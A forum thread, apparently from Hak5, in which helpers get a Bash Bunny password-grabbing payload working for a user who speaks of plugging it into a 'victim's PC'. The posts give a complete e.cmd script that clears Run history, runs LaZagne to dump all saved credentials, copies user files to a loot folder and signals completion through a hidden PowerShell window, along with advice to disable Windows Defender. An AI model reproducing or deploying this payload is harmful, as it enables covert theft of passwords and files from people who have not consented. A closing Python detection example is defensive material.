Need help with PasswordGrabber


Cech

Hey guys,

My Bash Bunny just arrived! But there is one problem: I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few codes in different documents, so could anyone tell me how to set it up on BashBunny?

https://github.com/hak5/bashbunny-payloads/pull/67

This is the script, but I don't really get how to place it on BashBunny. Thank you in advance!

Link to comment
Share on other sites

1) If you have not yet, update bunny and if so then ignore this.  This is just the common first answer you will get and has been the answer to many questions.

2) This payload needs an external project added, the LaZagne project: the compiled version for Windows, and it has to be in the switch folder with the payload.txt.

The compiled version is on the site too, or you can follow the directions for the LaZagne project to do your own compiling.

Link to comment
Share on other sites

I did everything, but nothing seems to work :/

(d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder, but once I plug it in I get empty directories. Also, my firmware is 1.4.

Link to comment
Share on other sites

Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain to me which files go where? Which file should go in the switch and which file should go somewhere else?

It's probably easier to understand for you professionals but not for regular people like me :)

Link to comment
Share on other sites

I don't remember the e and d files being exes.  They were cmd files.

 

Try this.  If you got the lazagne.exe then copy it to the machine and run it.  According to the command file the command below should display output to the screen.

lazagne.exe all -v

If you get something then we know lazagne works.  Next with the bashbunny in arming mode run the command again but add in " > driveletterofBB:\loot\lazagnetest.txt" where driveletterofBB is the current drive letter of BashBunny.  We are just testing here to make sure everything works piece by piece.  

Link to comment
Share on other sites

Ok, it works, it found all my passwords, but how do I place it in switch2 so that when I plug the BashBunny into the victim's PC the script starts attacking and saves all the passwords in the loot folder instead of making empty directories?

Link to comment
Share on other sites

Could be Windows Defender blocking LaZagne from working; it was the only thing I found that would give me an empty password.txt if it was active during the scan. It also auto-deletes hack tools or quarantines them automatically when active, so I always shut it off before arming my bunny.

Link to comment
Share on other sites

Configure the xcopy command in e.cmd to whatever you're trying to grab. I also found that if I have set up internet sharing with the bunny it won't dump files, but it still grabs passwords with LaZagne. If you have sharing turned on in your main network card, turn it off when testing the payload. lazagne.exe/i.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folder so they can be used together.

*Also use Notepad++, not Notepad, 'cause it works better.

Link to comment
Share on other sites

#the link you provided doesn't work since it's a local file, not an internet file lol, but here is my e.cmd for txt files

@echo off
@echo Installing Windows Update
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
setlocal

#Below uses the laZagne.exe in your switch folder

cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

#Below runs xcopy to grab files specified by location and file extension (the one below grabs simple .txt documents)

#Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it.

set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)

#the line below spams caps lock to tell you that the payload is done and files are copied (if you have a caps lock LED on your keyboard it should blink when the payload finishes.)

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit


 

Link to comment
Share on other sites

First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

Link to comment
Share on other sites

The only line I change when coming from a fresh payload copy is:

The *'s are wildcards, so the xcopy will search any directories or names in the user profile containing txt files.

The /C /Q /G /Y are explained below the xcopy command; /S makes sure it doesn't grab empty folders.

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)
 

 

Link to comment
Share on other sites

4 minutes ago, Cech said:

First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

The PowerShell window opening then closing is the first line; everything else needs to load, so don't prematurely pull the bunny.

Wait for that caps lock to blink for the okay from the bunny itself.

The loot folder should contain a directory labeled with the victim, then a txt file containing the LaZagne scan.

For example, if I were to deploy this in the wild I would make sure it can be inserted and left for at least 5-10 min, to make sure the xcopy command finishes and exits so I don't miss anything.

It doesn't need to be 5-10 min (it only needs to hit the last line where it flashes caps lock), but it gives me a time frame to wait on, then come back to it and pull.

Link to comment
Share on other sites

This is kind of strange... I've copied all your files and when I plugged in the USB I got the notepad with all the usernames and passwords, so I was like... wow, let's try it out again. The second time when I put the USB in (I was waiting for the caps lock to finish blinking) I again got empty directories...

I was like, let's try once more, maybe I did something wrong. I placed the USB inside my computer and again, empty directories...

Link to comment
Share on other sites

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

Link to comment
Share on other sites

Above is a direct copy of my e.cmd,  e.cmd is the only file i ever edit on this payload.

**Try running it, and before pulling the Bash Bunny try to 'eject' it from Windows; if Windows gives you an error message saying it's busy then xcopy is still running, so you need to wait.**

**BB is fast but you still need to give it time for some payloads, especially exfiltration payloads.**

**Just think about how long it takes you to move pictures or docs onto a normal flash drive; the BB does have a great transfer rate though lol.**

Link to comment
Share on other sites
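
From the defender's side, the command lines in the e.cmd posted in this thread leave a recognisable process-creation trail on the host. The following is an added example, not part of the original thread or of the payload: it correlates those behaviours over constructed process-creation events. The event fields (`host`, `ts`, `cmdline`), the rule names, the sample paths and the thresholds are all assumptions.

```python
import re
from collections import defaultdict

# Patterns derived from the command lines in the e.cmd posted in this thread.
RULES = {
    "runmru_history_cleared": re.compile(r"\breg(\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU", re.I),
    "lazagne_executed": re.compile(r"\blazagne(\.exe)?\b", re.I),
    "hidden_ps_capslock_signal": re.compile(
        r"powershell.*-WindowStyle\s+Hidden.*SendKeys\('\{CAPSLOCK\}'\)", re.I),
}
DRIVE = re.compile(r"(?<![A-Za-z])([A-Za-z]):\\")

def match_rules(cmdline):
    """Return the names of all rules a single command line triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    # xcopy from a user profile to a different drive letter (e.g. removable storage)
    drives = {d.upper() for d in DRIVE.findall(cmdline)}
    if (re.search(r"\bxcopy(\.exe)?\b", cmdline, re.I)
            and "\\users\\" in cmdline.lower() and len(drives) > 1):
        hits.add("xcopy_profile_to_other_drive")
    return hits

def correlate(events, window=300, threshold=2):
    """Map host -> sorted rule names where >= threshold distinct rules fire within window seconds."""
    per_host = defaultdict(list)
    for ev in events:
        for rule in match_rules(ev["cmdline"]):
            per_host[ev["host"]].append((ev["ts"], rule))
    alerts = {}
    for host, hits in per_host.items():
        for start, _ in hits:
            seen = {r for t, r in hits if start <= t <= start + window}
            if len(seen) >= threshold:
                alerts[host] = sorted(seen | set(alerts.get(host, [])))
    return alerts

# Constructed sample events (not real logs); ts is seconds since the first event.
SAMPLE = [
    {"host": "PC01", "ts": 0, "cmdline": r"REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"host": "PC01", "ts": 2, "cmdline": r"E:\payloads\switch1\laZagne.exe all"},
    {"host": "PC01", "ts": 40, "cmdline": r"xcopy /C /Q /G /Y /S C:\Users\alice\*\*.txt E:\loot\USB_Exfiltration\PC01"},
    {"host": "PC01", "ts": 200, "cmdline": "powershell.exe -nologo -WindowStyle Hidden -sta -command \"$wsh.SendKeys('{CAPSLOCK}')\""},
    {"host": "PC02", "ts": 5, "cmdline": r"xcopy /S C:\Users\bob\Documents D:\backup"},
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE).items():
        print(host, rules)
```

A single rule on its own, such as the ordinary backup xcopy on PC02, stays below the threshold; only the combination within the time window raises an alert.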

Archived

This topic is now archived and is closed to further replies.
